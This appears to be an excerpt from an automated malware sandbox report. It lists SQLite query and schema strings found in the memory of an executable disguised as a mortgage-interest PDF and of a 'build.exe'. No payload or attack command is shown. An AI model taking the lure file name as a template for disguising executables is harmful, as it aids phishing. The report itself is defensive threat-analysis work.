Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE Application SET Status='deleted',Stale='true',LastUpdated=?70,LastSentTime=?71 WHERE (Status != 'deleted') AND AppId IN (SELECT x.AppId FROM File f INNER JOIN ApplicationFile x ON (x.FileId = f.FileId AND f.Status = 'deleted') GROUP BY (x.AppId) HAVING (COUNT(x.AppId) = (SELECT COUNT(*) FROM ApplicationFile WHERE AppId=x.Appid)));
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT DISTINCT Application.AppId,Name,Version,InstallLocation FROM Application INNER JOIN ApplicationInstallLocation ON (Application.AppId = ApplicationInstallLocation.AppId AND Application.ARPRegistryKey=?1);
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2324907056.0000000010375000.00000004.00001000.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2323953234.0000000010119000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: INSERT OR REPLACE INTO Service (ServiceId,FileId,ServiceName,Arguments,StartType,ServiceType,UserAccount,DisplayName,Description) VALUES ((SELECT ServiceId FROM Service WHERE ServiceName=?1),?20,?1, ?3, ?4, ?5, ?6, ?7, ?8);
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: INSERT OR REPLACE INTO File (FileId,Path,ProcessName,Sha256,Stale,CompanyName,Publisher,Sigflags,ProductName,ApplicationLaunchPoint,Version,Description,ProductVersion,OriginalFilename,Size,IsStandalone,WhitelistDrift,WhitelistSource,WhitelistedTime,IsScriptFile,ModernApp,MSIfile,Status,normalized_path,FolderID,LastUpdated,LastSentTime) VALUES ((SELECT FileId FROM File WHERE Path=?1 AND Sha256 LIKE ?4),?11, ?2,COALESCE((SELECT Sha256 FROM File WHERE Path=?1 AND Sha256 LIKE ?10),?9),?5,?20, ?18, ?19, ?21, ?22, ?23, ?24, ?25, ?26, ?27,?35,?40,?41,?42,?50,?53,?54,?55,?60,?68,?70,?71);
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE Application SET Stale=?5,LastUpdated=?70,LastSentTime=?71,Status='modified' WHERE Status != 'deleted' AND LastSentTime != 0 AND AppId IN (SELECT DISTINCT x.AppId FROM File f INNER JOIN ApplicationFile x ON (x.FileId = f.FileId) WHERE f.Path=?1 AND f.Sha256 LIKE ?4);
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE Application SET MSIfile=?54,Status='deleted',LastUpdated=?70,LastSentTime=?71 WHERE MSIfile=?55 AND Name=?2 AND Version != ?3 AND Architecture LIKE ?10;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE File SET Status=?9,LastSentTime=?8 WHERE Status != 'unchanged' AND Status != 'deleted' AND IsScriptFile=?4;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE Application SET IsStandAlone=?7,LastUpdated=?70 WHERE Appid=?1;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2324907056.0000000010375000.00000004.00001000.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2323953234.0000000010119000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS File (FileId integer PRIMARY KEY,Stale text,Version text,Pathtext NOT NULL,Description text,ApplicationLaunchPointtext,Sha256 text,ProductName text,ProductVersion text,OriginalFilename text,ProcessName text,CompanyName text,Publisher text,Sigflags text,IsStandalonetext,WhitelistDrifttext,WhitelistSourcetext,WhitelistedTimetext,Size integer,IsScriptFiletext,ModernApptext collate nocase,MSIfiletext,Statustext,normalized_pathtext,FolderIDtext,LastUpdatedinteger,LastSentTimeinteger,UNIQUE (Path,SHA256));
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT * FROM File WHERE Path=?1 AND Sha256=?4;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE File SET ApplicationLaunchPoint=?11,ProcessName=?2,Stale=?5,LastUpdated=?70,LastSentTime=?71 WHERE Path=?1 AND Sha256 LIKE ?4;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS Platform (StatusId integer PRIMARY KEY,device_os_platformtext,device_os_servicepacktext,device_os_versiontext);
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT * FROM File WHERE status != 'unchanged' AND IsScriptFile=?4;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT AppId,Name,Version,Architecture FROM Application;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT * FROM DatabaseStatus;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS ApplicationFile (AppId integer,FileId integer,PRIMARY KEY (AppId, FileId)FOREIGN KEY (FileId) REFERENCES File(FileId));
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: INSERT INTO ApplicationCode (AppId,Code,CodeType) VALUES (?1, ?2, ?3);
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT * FROM File WHERE RowId=?1;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS Application (AppIdinteger PRIMARY KEY,Stale text NOT NULL,Nametext NOT NULL,Version text,ModifiedVersiontext,InstallSource text,Publisher text,IsStandalonetext,ARPRegistryKeytext collate nocase,AppIsCompletelyScannedtext,Architecturetext,MSIfiletext,Statustext,LastUpdatedinteger,LastSentTimeinteger);
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT FileId,Path,Sha256,Publisher,Sigflags,ModernApp FROM File WHERE status != 'deleted';
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS ApplicationInstallLocation (AppId integer,InstallLocationId integer,InstallLocationtext NOT NULL,IsStandalonetext,PRIMARY KEY (AppId, InstallLocationId)FOREIGN KEY (AppId) REFERENCES Application(AppId));
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE File SET MSIfile=?11,ProcessName=?2,Stale=?5,LastUpdated=?70,LastSentTime=?71 WHERE Path=?1 AND Sha256 LIKE ?4;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT * FROM File WHERE Path=?1 AND Sha256 LIKE ?4;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT DISTINCT AppId FROM ApplicationInstallLocation INNER JOIN File ON (File.Path BETWEEN (ApplicationInstallLocation.InstallLocation \|\| '\') AND (ApplicationInstallLocation.InstallLocation \|\| 'hex(7F)') AND File.Status != 'unchanged');
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2441979277.0000000003E01000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2439191366.00000000006B7000.00000008.00000001.01000000.00000007.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT COUNT(*) FROM File WHERE status != 'unchanged' AND IsScriptFile=?4;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS Service (ServiceId integer PRIMARY KEY,FileId integer,ServiceName text NOT NULL,Argumentstext NOT NULL,StartType integer NOT NULL,ServiceType integer NOT NULL,UserAccount text NOT NULL,DisplayName text NOT NULL,Description text NOT NULL,FOREIGN KEY (FileId) REFERENCES File(FileId));
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE Application SET Stale=?5,LastUpdated=?70,LastSentTime=?71,Status='modified' WHERE Status != 'deleted' AND LastSentTime != 0 ;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT * FROM Application WHERE Stale=?5;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS ApplicationCode (AppId integer,Code text NOT NULL,CodeTypetext NOT NULL,PRIMARY KEY (AppId, Code)FOREIGN KEY (AppId) REFERENCES Application(AppId));
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE Application SET InstallSource=?4,LastUpdated=?70,LastSentTime=?71 WHERE Name=?2 AND Version LIKE ?3 AND Architecture LIKE ?10;
